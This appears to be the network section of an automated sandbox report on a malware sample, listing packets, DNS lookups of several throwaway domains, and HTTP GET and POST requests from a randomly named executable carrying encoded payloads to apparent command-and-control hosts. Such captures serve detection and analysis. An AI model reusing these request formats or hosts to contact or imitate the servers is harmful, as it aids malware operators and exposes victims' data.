                                                                    Dec 6, 2024 10:05:57.124907017 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.125504971 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.132704973 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.132955074 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.133132935 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.141035080 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.141066074 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.143521070 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.149360895 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.149696112 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.149746895 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.157762051 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.157998085 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.158049107 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.166034937 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.166706085 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.167527914 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.173074961 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.173499107 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.173583984 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.180074930 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.180944920 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.183615923 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.201889992 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.202424049 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.204052925 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.205449104 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.252595901 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.289019108 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.289586067 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.291379929 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.291534901 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.291723967 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.295291901 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.295305967 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.295350075 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.295382023 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.299695015 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.299850941 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.301920891 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.343424082 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.463351011 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:06:03.450577974 CET4993980192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:03.570847988 CET8049939206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:03.570955992 CET4993980192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:03.585201979 CET4993980192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:03.705127954 CET8049939206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:05.091571093 CET8049939206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:05.092137098 CET8049939206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:05.092185974 CET4993980192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:05.096575975 CET4993980192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:06.115087032 CET4994780192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:06.234946966 CET8049947206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:06.235012054 CET4994780192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:06.249603033 CET4994780192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:06.369541883 CET8049947206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:07.739245892 CET8049947206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:07.740489006 CET8049947206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:07.740586042 CET4994780192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:07.752835989 CET4994780192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:08.771769047 CET4995680192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:08.891958952 CET8049956206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:08.892232895 CET4995680192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:08.909856081 CET4995680192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:09.029818058 CET8049956206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:09.029831886 CET8049956206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:10.392932892 CET8049956206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:10.393304110 CET8049956206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:10.393359900 CET4995680192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:10.424902916 CET4995680192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:11.508790016 CET4996280192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:11.628659010 CET8049962206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:11.628743887 CET4996280192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:11.637531042 CET4996280192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:11.757337093 CET8049962206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:13.136332989 CET8049962206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:13.136364937 CET8049962206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:13.136574984 CET4996280192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:13.139316082 CET4996280192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:13.259258986 CET8049962206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:18.555876970 CET4997780192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:18.675667048 CET804997766.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:18.675821066 CET4997780192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:18.690048933 CET4997780192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:18.809783936 CET804997766.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:19.912571907 CET804997766.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:19.912662029 CET804997766.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:19.912719965 CET4997780192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:20.206288099 CET4997780192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:21.224910975 CET4998580192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:21.344636917 CET804998566.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:21.344724894 CET4998580192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:21.360471964 CET4998580192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:21.480274916 CET804998566.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:22.579344988 CET804998566.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:22.579474926 CET804998566.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:22.579528093 CET4998580192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:22.863748074 CET4998580192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:23.881448030 CET4999380192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:24.001399994 CET804999366.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:24.001534939 CET4999380192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:24.015970945 CET4999380192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:24.136781931 CET804999366.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:24.136795998 CET804999366.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:25.230676889 CET804999366.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:25.230709076 CET804999366.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:25.230863094 CET4999380192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:25.520780087 CET4999380192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:26.537631035 CET4999980192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:26.660532951 CET804999966.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:26.660608053 CET4999980192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:26.670553923 CET4999980192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:26.790404081 CET804999966.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:27.894550085 CET804999966.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:27.894635916 CET804999966.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:27.894773006 CET4999980192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:27.898320913 CET4999980192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:28.018101931 CET804999966.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:33.654608011 CET5001680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:33.774310112 CET8050016217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:33.774393082 CET5001680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:33.789685965 CET5001680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:33.909545898 CET8050016217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:35.015230894 CET8050016217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:35.015274048 CET8050016217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:35.015331030 CET5001680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:35.300168991 CET5001680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:36.323033094 CET5002280192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:36.442934036 CET8050022217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:36.443151951 CET5002280192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:36.457626104 CET5002280192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:36.577539921 CET8050022217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:37.684429884 CET8050022217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:37.684458017 CET8050022217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:37.684526920 CET5002280192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:37.972445011 CET5002280192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:38.997865915 CET5002580192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:39.117925882 CET8050025217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:39.118035078 CET5002580192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:39.133775949 CET5002580192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:39.255399942 CET8050025217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:39.255415916 CET8050025217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:40.441657066 CET8050025217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:40.442397118 CET8050025217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:40.442512989 CET5002580192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:40.644134045 CET5002580192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:41.662797928 CET5002680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:41.782768011 CET8050026217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:41.782856941 CET5002680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:41.792201996 CET5002680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:41.912092924 CET8050026217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:43.025305033 CET8050026217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:43.025383949 CET8050026217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:43.025394917 CET8050026217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:43.025490999 CET8050026217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:43.025523901 CET5002680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:43.025573015 CET5002680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:43.030422926 CET5002680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:43.150055885 CET8050026217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:49.083209038 CET5002780192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:49.202912092 CET805002713.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:49.203011036 CET5002780192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:49.216758966 CET5002780192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:49.338861942 CET805002713.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:50.722385883 CET5002780192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:50.799555063 CET805002713.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:50.799596071 CET805002713.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:50.799761057 CET5002780192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:50.799813032 CET5002780192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:50.842092037 CET805002713.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:50.842195034 CET5002780192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:51.754044056 CET5002880192.168.2.613.228.81.39
                                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                    Dec 6, 2024 10:05:29.263572931 CET | 192.168.2.6 | 1.1.1.1 | 0xbd6d | Standard query (0) | www.qqa79.top | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:05:46.459527969 CET | 192.168.2.6 | 1.1.1.1 | 0xead6 | Standard query (0) | www.gk88top.top | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:06:02.349880934 CET | 192.168.2.6 | 1.1.1.1 | 0xbb79 | Standard query (0) | www.127358.win | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:06:03.362207890 CET | 192.168.2.6 | 1.1.1.1 | 0xbb79 | Standard query (0) | www.127358.win | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:06:18.146966934 CET | 192.168.2.6 | 1.1.1.1 | 0x4a92 | Standard query (0) | www.infohive.website | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:06:32.913201094 CET | 192.168.2.6 | 1.1.1.1 | 0x446 | Standard query (0) | www.sunnyz.store | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:06:48.038472891 CET | 192.168.2.6 | 1.1.1.1 | 0x338b | Standard query (0) | www.muasamgiare.click | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:06:49.034908056 CET | 192.168.2.6 | 1.1.1.1 | 0x338b | Standard query (0) | www.muasamgiare.click | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:07:03.804383993 CET | 192.168.2.6 | 1.1.1.1 | 0x5e4e | Standard query (0) | www.sfantulandrei.info | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:07:18.757397890 CET | 192.168.2.6 | 1.1.1.1 | 0x6c4e | Standard query (0) | www.mffnow.info | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:07:34.664074898 CET | 192.168.2.6 | 1.1.1.1 | 0x5fd8 | Standard query (0) | www.3kw40881107247y.click | A (IP address) | IN (0x0001) | false
                                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                    Dec 6, 2024 10:05:29.750101089 CET | 1.1.1.1 | 192.168.2.6 | 0xbd6d | No error (0) | www.qqa79.top | qqa79.top |  | CNAME (Canonical name) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:05:29.750101089 CET | 1.1.1.1 | 192.168.2.6 | 0xbd6d | No error (0) | qqa79.top |  | 38.47.233.21 | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:05:46.602241993 CET | 1.1.1.1 | 192.168.2.6 | 0xead6 | No error (0) | www.gk88top.top |  | 104.21.7.187 | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:05:46.602241993 CET | 1.1.1.1 | 192.168.2.6 | 0xead6 | No error (0) | www.gk88top.top |  | 172.67.137.47 | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:06:03.447992086 CET | 1.1.1.1 | 192.168.2.6 | 0xbb79 | No error (0) | www.127358.win |  | 206.238.89.119 | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:06:03.500432014 CET | 1.1.1.1 | 192.168.2.6 | 0xbb79 | No error (0) | www.127358.win |  | 206.238.89.119 | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:06:18.549081087 CET | 1.1.1.1 | 192.168.2.6 | 0x4a92 | No error (0) | www.infohive.website |  | 66.29.149.46 | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:06:33.652059078 CET | 1.1.1.1 | 192.168.2.6 | 0x446 | No error (0) | www.sunnyz.store | webredir.vip.gandi.net |  | CNAME (Canonical name) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:06:33.652059078 CET | 1.1.1.1 | 192.168.2.6 | 0x446 | No error (0) | webredir.vip.gandi.net |  | 217.70.184.50 | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:06:49.080565929 CET | 1.1.1.1 | 192.168.2.6 | 0x338b | No error (0) | www.muasamgiare.click | dns.ladipage.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:06:49.080565929 CET | 1.1.1.1 | 192.168.2.6 | 0x338b | No error (0) | dns.ladipage.com |  | 13.228.81.39 | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:06:49.080565929 CET | 1.1.1.1 | 192.168.2.6 | 0x338b | No error (0) | dns.ladipage.com |  | 54.179.173.60 | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:06:49.080565929 CET | 1.1.1.1 | 192.168.2.6 | 0x338b | No error (0) | dns.ladipage.com |  | 18.139.62.226 | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:06:49.172219038 CET | 1.1.1.1 | 192.168.2.6 | 0x338b | No error (0) | www.muasamgiare.click | dns.ladipage.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:06:49.172219038 CET | 1.1.1.1 | 192.168.2.6 | 0x338b | No error (0) | dns.ladipage.com |  | 54.179.173.60 | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:06:49.172219038 CET | 1.1.1.1 | 192.168.2.6 | 0x338b | No error (0) | dns.ladipage.com |  | 18.139.62.226 | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:06:49.172219038 CET | 1.1.1.1 | 192.168.2.6 | 0x338b | No error (0) | dns.ladipage.com |  | 13.228.81.39 | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:07:04.551013947 CET | 1.1.1.1 | 192.168.2.6 | 0x5e4e | No error (0) | www.sfantulandrei.info |  | 199.59.243.227 | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:07:19.244645119 CET | 1.1.1.1 | 192.168.2.6 | 0x6c4e | No error (0) | www.mffnow.info |  | 172.67.178.93 | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:07:19.244645119 CET | 1.1.1.1 | 192.168.2.6 | 0x6c4e | No error (0) | www.mffnow.info |  | 104.21.91.191 | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:07:34.973643064 CET | 1.1.1.1 | 192.168.2.6 | 0x5fd8 | No error (0) | www.3kw40881107247y.click |  | 172.67.192.207 | A (IP address) | IN (0x0001) | false
                                                                    Dec 6, 2024 10:07:34.973643064 CET | 1.1.1.1 | 192.168.2.6 | 0x5fd8 | No error (0) | www.3kw40881107247y.click |  | 104.21.44.16 | A (IP address) | IN (0x0001) | false
                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    0 | 192.168.2.6 | 49857 | 38.47.233.21 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:05:29.894571066 CET | 589 | OUT | GET /t67p/?T2M=Y0Z0G&KxZ=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXK+0pIYn6OsKXO6mwWbUGH3YR5hyu6M0h3PqYDwJCf+R1lkRh9UQ= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.qqa79.top
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Dec 6, 2024 10:05:31.407588959 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Fri, 06 Dec 2024 09:05:31 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 548
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    1 | 192.168.2.6 | 49899 | 104.21.7.187 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:05:46.753936052 CET | 851 | OUT | POST /vjnn/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.gk88top.top
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 208
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.gk88top.top
                                                                    Referer: http://www.gk88top.top/vjnn/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 50 79 73 6d 45 4a 79 38 36 66 66 4e 4d 41 42 63 37 55 32 59 39 39 76 39 62 72 38 52 57 46 44 52 2f 5a 5a 39 4f 42 4e 6f 78 76 64 57 77 34 6f 73 33 72 37 4f 78 79 35 61 63 55 42 39 77 63 47 2f 41 73 4b 32 44 39 38 76 33 56 68 39 2b 42 52 52 6d 73 50 4b 46 68 55 56 7a 62 6d 30 41 59 4b 72 77 39 4f 62 31 4a 78 34 76 2b 4e 51 56 36 42 4f 56 6d 75 36 55 62 41 67 54 4e 6f 51 4c 70 63 58 37 77 36 44 70 6b 39 43 70 4b 67 71 49 74 53 35 67 4c 50 65 75 6f 38 44 48 43 4a 72 4e 65 76 67 36 65 35 66 45 7a 6d 62 6b 46 76 77 6b 37 6a 57 73 67 74 50 4c 70 5a 79 68 68 59 6b 55 62 4d 50
                                                                    Data Ascii: KxZ=y/nbf6lCzqeuPysmEJy86ffNMABc7U2Y99v9br8RWFDR/ZZ9OBNoxvdWw4os3r7Oxy5acUB9wcG/AsK2D98v3Vh9+BRRmsPKFhUVzbm0AYKrw9Ob1Jx4v+NQV6BOVmu6UbAgTNoQLpcX7w6Dpk9CpKgqItS5gLPeuo8DHCJrNevg6e5fEzmbkFvwk7jWsgtPLpZyhhYkUbMP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    2 | 192.168.2.6 | 49905 | 104.21.7.187 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:05:49.421013117 CET | 875 | OUT | POST /vjnn/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.gk88top.top
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 232
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.gk88top.top
                                                                    Referer: http://www.gk88top.top/vjnn/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
